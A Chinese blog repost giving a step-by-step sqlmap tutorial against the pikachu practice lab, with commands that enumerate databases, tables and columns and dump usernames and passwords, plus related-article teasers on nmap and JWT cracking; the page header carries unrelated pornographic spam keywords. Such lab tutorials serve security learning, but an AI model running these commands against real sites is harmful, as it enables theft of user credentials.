国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

  1. Toy模板網(wǎng)首頁
  2. >Toy博客

kali工具SQLmap基本使用方法流程以及命令解析

2年前作者:Strelizia_XX分類:Toy博客閱讀(22)違法舉報

這篇具有很好參考價值的文章主要介紹了kali工具SQLmap基本使用方法流程以及命令解析。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點(diǎn)擊"舉報違法"按鈕提交疑問。

這邊來詳細(xì)寫一篇SQLmap工具的使用方法,這邊借用了pikachu里sql注入類的字符形注入

kali工具SQLmap基本使用方法流程以及命令解析

?首先sql注入肯定要先找注入點(diǎn)在哪里,我們在輸入欄里輸入admin試試

kali工具SQLmap基本使用方法流程以及命令解析

?看到有向后臺查詢的get請求,然后直接放到sqlmap里試一下

sqlmap -u "http://172.16.107.243/pikachu/vul/sqli/sqli_str.phpname=admin&submit=%E6%9F%A5%E8%AF%A2"

注意:-u后面的URL鏈接一定要加雙引號,不加的話有時候get請求里會有(&)這個符號不加雙引號的URL鏈接有這個符號就會報錯

如果URL正確的話他會出現(xiàn)很多如下圖的選項,這些可以按需要選擇,如果看不懂的話可以全都輸入y,然后按回車就可以了

kali工具SQLmap基本使用方法流程以及命令解析

?如果出現(xiàn)下圖這些信息,那么恭喜你該網(wǎng)站存在sql注入漏洞,就可以進(jìn)行下一步操作,如果提示報錯的話,可以看情況修改URL,或者該網(wǎng)站不存在sql?注入漏洞

kali工具SQLmap基本使用方法流程以及命令解析

經(jīng)過上一步可以看出來,改網(wǎng)站存在sql注入漏洞,那么可以進(jìn)行下一步,查詢數(shù)據(jù)庫了?

kali工具SQLmap基本使用方法流程以及命令解析

sqlmap -u "http://172.16.107.243/pikachu/vul/sqli/sqli_str.php?name=admin&submit=%E6%9F%A5%E8%AF%A2" -dbs

?-bds的意思就是查詢該網(wǎng)站后臺所有數(shù)據(jù)庫

kali工具SQLmap基本使用方法流程以及命令解析然后就出來了改后臺所有的數(shù)據(jù)庫,我們對pikachu這個庫進(jìn)行下一步,查看該數(shù)據(jù)庫里所有的表?

sqlmap -u "http://172.16.107.243/pikachu/vul/sqli/sqli_str.php?name=admin&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -tables

kali工具SQLmap基本使用方法流程以及命令解析

?-D的意思就是指定查詢改數(shù)據(jù)庫,-tables的意思就是查詢該數(shù)據(jù)庫內(nèi)所有的表

kali工具SQLmap基本使用方法流程以及命令解析?查詢出改表內(nèi)有五個表,我們對敏感表users進(jìn)行下一步,查詢表內(nèi)字段

sqlmap -u "http://172.16.107.243/pikachu/vul/sqli/sqli_str.php?name=admin&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users -columns

kali工具SQLmap基本使用方法流程以及命令解析

?-T的意思是指定指定某數(shù)據(jù)的表,-columns是列出該表所有的字段名

kali工具SQLmap基本使用方法流程以及命令解析?我們進(jìn)行對敏感信息,username,password進(jìn)行下一步查詢

sqlmap -u "http://172.16.107.243/pikachu/vul/sqli/sqli_str.php?name=admin&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users -C username,password -dump

kali工具SQLmap基本使用方法流程以及命令解析

?-C是指定字段,-dump是列出這段內(nèi)信息

kali工具SQLmap基本使用方法流程以及命令解析

?這里就看到賬號密碼了,sql數(shù)據(jù)庫默認(rèn)是對密碼MD5加密的,sqlmap有個功能可以把列出來的密碼自動解密,如下圖,這個選項選了yes的話就會對密碼解密

kali工具SQLmap基本使用方法流程以及命令解析

?如果對sqlmap這個工具有其他需求的話,可以使用sqlmap -help,來查看他其他命令選項。文章來源地址http://www.zghlxwxcb.cn/news/detail-418035.html

到了這里,關(guān)于kali工具SQLmap基本使用方法流程以及命令解析的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點(diǎn)擊違法舉報進(jìn)行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 滲透工具-sqlmap-基本知識及使用教程

    滲透工具-sqlmap-基本知識及使用教程

    ? -u 指定目標(biāo)URL (可以是http協(xié)議也可以是https協(xié)議) -d 連接數(shù)據(jù)庫 --dbs 列出所有的數(shù)據(jù)庫 --current-db 列出當(dāng)前數(shù)據(jù)庫 --tables 列出當(dāng)前的表 --columns 列出當(dāng)前的列 -D 選擇使用哪個數(shù)據(jù)庫 -T 選擇使用哪個表 -C 選擇使用哪個列 --dump 獲取字段中的數(shù)據(jù) --dump-all ?拖庫 --batch ?自動選擇

    2024年02月04日
    瀏覽(19)
  • 自動化測試工具Selenium的基本使用方法,面試字節(jié)跳動的前端工程師該怎么準(zhǔn)備

    自動化測試工具Selenium的基本使用方法,面試字節(jié)跳動的前端工程師該怎么準(zhǔn)備

    8.小結(jié) 上述均可以改寫成find_element(By.ID,‘kw’)的形式 find_elements_by_xxx的形式是查找到多個元素,結(jié)果為列表 import time from selenium import webdriver#驅(qū)動瀏覽器 from selenium.webdriver import ActionChains #滑動 from selenium.webdriver.common.by import By #選擇器 from selenium.webdriver.common.by import By #按照什

    2024年04月16日
    瀏覽(25)

  • Kali中docker使用方法

    eg: 拉取CVE-2017-7504的漏洞環(huán)境為例子 Step 1: 查找并下載 Step 2: Step 3: 查看容器id 鏡像名 以及容器與宿主機(jī)映射的端口號,容器名 Step 4: Step 5: 查看容器id 鏡像名 以及容器與宿主機(jī)映射的端口號,容器名;列出正在運(yùn)行的容器。 Step 6: 進(jìn)入容器終端 這里就成功進(jìn)入docker環(huán)境了

    2024年02月13日
    瀏覽(29)
  • nmap在kali的使用方法和常見命令(入門)

    nmap在kali的使用方法和常見命令(入門)

    kali linux 自帶有namp,無需下載安裝,命令形式為namp + 點(diǎn)擊可查看使用說明信息 掃描目標(biāo)計算機(jī),一般可以獲取以下信息: 是否在線 所在網(wǎng)絡(luò)的拓?fù)?開放的端口 所使用的操作系統(tǒng) 所運(yùn)行的服務(wù)與版本 所存在的漏洞 常用命令窮舉 經(jīng)典單個主機(jī)IP/域名普通掃描: 只檢測是否

    2024年02月11日
    瀏覽(49)
  • sqlmap 使用筆記(kali環(huán)境)

    sqlmap 使用筆記(kali環(huán)境)

    kali環(huán)境 -u或–url 直接掃描單個路徑 -m 文件中保存多個url,工具會依次掃描 -r 從文件中獲取http請求 文件內(nèi)容直接copy 當(dāng)請求是HTTPS的時候,需要配合–force-ssl參數(shù)來使用,或者可以在Host頭后面加上:443 請求設(shè)置 在有些時候web服務(wù)器使用了偽靜態(tài),導(dǎo)致無法直接使用sqlmap測試

    2024年02月20日
    瀏覽(15)
  • ubuntu/kali安裝c-jwt-cracker及使用方法

    ubuntu/kali安裝c-jwt-cracker及使用方法

    c-jwt-cracker介紹: c-jwt-cracker是用 C 語言編寫的多線程 JWT 暴力破解程序(所以在運(yùn)行它的時候你的CPU可能會出現(xiàn)100%使用的情況)。 安裝和使用步驟: 一、下載和安裝 有兩種下載方式(這里我受用的是第二種): 1、在ubuntu中直接下載(不推薦),這種方法比較慢,容易加載

    2024年04月11日
    瀏覽(110)
  • Kali Live Boot把Kali 裝在U盤(不想重裝電腦使用kali的方法)并持久化 詳細(xì)

    Kali Live Boot把Kali 裝在U盤(不想重裝電腦使用kali的方法)并持久化 詳細(xì)

    我只有一臺電腦,又想用kali,那只能在虛擬機(jī)安裝使用了,但是呢在虛擬機(jī)又不能使用電腦的硬件,比如無線網(wǎng)卡,當(dāng)然另外買的除外,我說的是筆記本自帶的網(wǎng)卡。而用這個方法就相當(dāng)于在你的電腦上裝了kali,但是又不會影響你之前用的系統(tǒng)。另外你還可以帶著你的kali去網(wǎng)

    2024年02月05日
    瀏覽(25)
  • kali linux下sqlmap使用教程

    kali linux下sqlmap使用教程

    有windows和linux兩個版本使用,可跨系統(tǒng)進(jìn)行操作,語法參數(shù)都相同,此處以kali linux為例進(jìn)行操作

    2024年02月11日
    瀏覽(14)
  • 關(guān)于解決使用kali無線網(wǎng)卡無法掃描到WiFi信號的方法

    關(guān)于解決使用kali無線網(wǎng)卡無法掃描到WiFi信號的方法

    1.插入能夠滲透用的無線網(wǎng)卡(我的無線網(wǎng)卡是3071類型的,免驅(qū))并在物理機(jī)上禁用它,使kali能夠獨(dú)享整個無線網(wǎng)卡(注:若在物理機(jī)上找不到無線網(wǎng)卡,則需要下載驅(qū)動精靈安裝驅(qū)動或者更新本機(jī)的網(wǎng)卡驅(qū)動) ? 2.需要安裝掃描WiFi用的必要的軟件包,命令為:apt-get insta

    2024年02月11日
    瀏覽(60)

  • kali被動收集信息,Google搜索引擎使用技巧,Maltego收集子域名,Shodan搜索引擎使用方法

    GoogleHack一般指google hack。 google hack是指使用Google等搜索引擎對某些特定的網(wǎng)絡(luò)主機(jī)漏洞(通常是服務(wù)器上的腳本漏洞)進(jìn)行搜索,以達(dá)到快速找到漏洞主機(jī)或特定主機(jī)的漏洞的目的。 常用的Google site?? ?指定域名 inurl?? ?URL中存在的關(guān)鍵在頁面 intext?? ?網(wǎng)頁內(nèi)容里面

    2024年02月12日
    瀏覽(34)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包